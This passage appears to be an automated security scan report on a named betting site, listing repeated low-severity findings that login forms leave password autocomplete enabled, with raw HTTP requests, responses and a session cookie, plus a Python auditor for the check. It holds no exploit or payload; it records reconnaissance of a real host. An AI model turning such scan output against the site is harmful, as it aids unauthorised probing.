Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:13 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.20. https://scratch.betsson.com/en/Casino/Disco-Keno

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Disco-Keno

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Disco-Keno HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:38 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.21. https://scratch.betsson.com/en/Casino/HiLo

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/HiLo

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/HiLo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:49 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.22. https://scratch.betsson.com/en/Casino/Lucky-21

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Lucky-21

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Lucky-21 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:31 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.23. https://scratch.betsson.com/en/Casino/Namaste

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Namaste

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Namaste HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:56 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.24. https://scratch.betsson.com/en/Casino/Poker-King

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Poker-King

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Poker-King HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:36 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.25. https://scratch.betsson.com/en/Casino/Roulette

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Roulette

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Roulette HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:44 GMT
Connection: close
Content-Length: 102684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.26. https://scratch.betsson.com/en/Casino/Royal-Slots

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Royal-Slots

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Royal-Slots HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:16 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.27. https://scratch.betsson.com/en/Casino/Slot-Super-7

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Slot-Super-7

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Slot-Super-7 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:16 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.28. https://scratch.betsson.com/en/Classic

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Classic HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:14 GMT
Connection: close
Content-Length: 102590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.29. https://scratch.betsson.com/en/Classic/3-Wow

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/3-Wow

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Classic/3-Wow HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:38 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.30. https://scratch.betsson.com/en/Classic/7th-Heaven

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/7th-Heaven

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Classic/7th-Heaven HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:40 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:40 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.31. https://scratch.betsson.com/en/Classic/Champagne

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Champagne

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Classic/Champagne HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:27 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:27 GMT
Connection: close
Content-Length: 102692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.32. https://scratch.betsson.com/en/Classic/Golden-Fortune

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Golden-Fortune

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Classic/Golden-Fortune HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:55 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:55 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...
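The check behind every finding in this section is mechanical: locate each `<input type="password">` in the response body and test whether it, or its enclosing `<form>`, carries `autocomplete="off"`. The auditor below is an added example written for this page, not code from the scan report or from the scanner that produced it. Its sample markup is constructed from the login-form fragment shown in the responses above; the username label and field and the closing tags that fall inside the `...[SNIP]...` regions are assumptions. It also shows the two hardened variants (attribute on the input, attribute on the form) that make the finding go away.

```python
# Added example, not part of the original scan report: reproduce the
# "password field with autocomplete enabled" check over a response body
# using only the Python standard library.
from html.parser import HTMLParser

# Constructed sample modelled on the login form in the responses above.
# The username field and the closing markup are assumptions standing in
# for the ...[SNIP]... sections.
VULNERABLE_BODY = """
<div id="login-form">
  <form action="#fallback-url-for-non-javascript-clients" method="post">
    <fieldset>
      <label for="tbUsername">Username</label>
      <input type="text" name="tbUsername" id="tbUsername" tabindex="1"/>
      <label for="tbPassword">Password</label>
      <input type="password" value="" name="tbPassword" id="tbPassword"
             tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
    </fieldset>
  </form>
</div>
"""

# Same form, autocompletion disabled on the password input itself.
HARDENED_BODY = VULNERABLE_BODY.replace(
    'type="password"', 'type="password" autocomplete="off"'
)

# Same form, autocompletion disabled once at form level for every field.
FORM_LEVEL_BODY = VULNERABLE_BODY.replace(
    'method="post"', 'method="post" autocomplete="off"'
)


class AutocompleteAuditor(HTMLParser):
    """Collect password inputs that the browser is allowed to auto-fill."""

    def __init__(self):
        super().__init__()
        self._forms = []      # stack of enclosing <form> elements
        self.findings = []    # one dict per offending password field

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names; a value-less attribute arrives as None.
        a = {name: (value or "") for name, value in attrs}
        if tag == "form":
            self._forms.append({
                "action": a.get("action", ""),
                "autocomplete": a.get("autocomplete", "").strip().lower(),
            })
        elif tag == "input" and a.get("type", "text").strip().lower() == "password":
            # A password field outside any form is still worth reporting.
            form = self._forms[-1] if self._forms else {"action": None, "autocomplete": ""}
            field_ac = a.get("autocomplete", "").strip().lower()
            # Protected if the field says "off" itself, or inherits "off"
            # from its form without overriding it.
            protected = field_ac == "off" or (field_ac == "" and form["autocomplete"] == "off")
            if not protected:
                self.findings.append({
                    "form_action": form["action"],
                    "field": a.get("name") or a.get("id") or "(unnamed)",
                    "line": self.getpos()[0],
                })

    def handle_endtag(self, tag):
        if tag == "form" and self._forms:
            self._forms.pop()


def audit(body):
    """Return the password fields with autocomplete enabled in an HTML body."""
    parser = AutocompleteAuditor()
    parser.feed(body)
    parser.close()
    return parser.findings


def issue_detail(finding):
    """Render one finding in the wording the report above uses."""
    return (
        "The page contains a form with the following action URL: "
        f"{finding['form_action']}\n"
        "The form contains the following password field with autocomplete "
        f"enabled: {finding['field']}"
    )


if __name__ == "__main__":
    for label, body in [("vulnerable", VULNERABLE_BODY),
                        ("hardened", HARDENED_BODY),
                        ("form-level", FORM_LEVEL_BODY)]:
        found = audit(body)
        print(f"{label}: {len(found)} finding(s)")
        for f in found:
            print(issue_detail(f))
```

Run stand-alone, the block reports one finding for the constructed page and none for either hardened variant. One caveat belongs next to this class of finding: most current browsers deliberately ignore `autocomplete="off"` on password fields so that their built-in password managers keep working, so the attribute is a defence-in-depth measure at best, which is consistent with the Low severity the report assigns.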

13.33. https://scratch.betsson.com/en/Classic/Happy-Birthday

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Happy-Birthday

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Happy-Birthday HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
